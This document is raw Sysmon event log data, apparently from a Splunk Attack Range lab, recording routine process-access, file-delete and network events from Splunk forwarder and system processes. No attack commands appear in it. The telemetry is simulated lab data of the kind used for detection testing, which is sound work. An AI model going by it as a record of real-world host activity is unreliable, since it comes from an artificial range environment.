11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-16E8-6216-FA04-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16E8-6216-FA04-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.376{4F8D34B0-16E8-6216-FA04-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.172{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C2F5771F4EFC15F883C097E0B7E1BF,SHA256=BC50C27F1274E88493DF2FA39439D0B91D2D83055C93E6FA757D03D28EF34DF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:45.752{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FF9EDD4F695EC182AAC85F4B8263986,SHA256=1EA58C18024FCA73EDF04B0CAF7092D309414B1C94ED34DA17A0AFD3E518673F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:45.594{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=976112F4F6EB0BA7DDFFE808C2237642,SHA256=A8161E77FE7B1EA2AF9297F749F44DA4225B0B531272F0DD0158891CA67A82E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:45.594{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3075CF8FE96A5AB5B9777F03AE897AE,SHA256=D45C6B424E3BCF6B9D42DA04A5C98D38D070A78FAE2342C1AF9D20A9AD3288F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:45.516{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1DC1CBC69E10E43A67E2AF50ACFA45,SHA256=90BD66C4A3E5F67DA31B3FC218A1F4317A8549D5098A00907B692A65F94186F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:46.783{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3299EDE427599B5EF02BD714A8AA10DA,SHA256=A5222308C201B255BB5BD0AD8250E07F97E92F62643B97B226E7434AB9B53304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:46.578{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017D62E0219DD41FE4B3D8661D89F875,SHA256=6E1F24D1911378A171BB9B065BDD9F60CF716F448B7A1FD5F255663E7631E0E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.638{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51611-false10.0.1.12-8000- 23542300x8000000000000000220844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:46.500{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.891{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87C18CBA42A547FED9891181298392E5,SHA256=F877E04473203D66469486E4C3971AE8CD78210B2C134FD2F6E2B40825F7635B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.812{4F8D34B0-16EB-6216-FD04-000000003902}32243092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:47.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F3AD3AC464761138EF1F624A58A12E0,SHA256=1E16F42975CA9AF2D79AD8B374605033F135913F16BB35478D6FBFD1A2EF19C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16EB-6216-FD04-000000003902}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16EB-6216-FD04-000000003902}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.672{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16EB-6216-FD04-000000003902}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 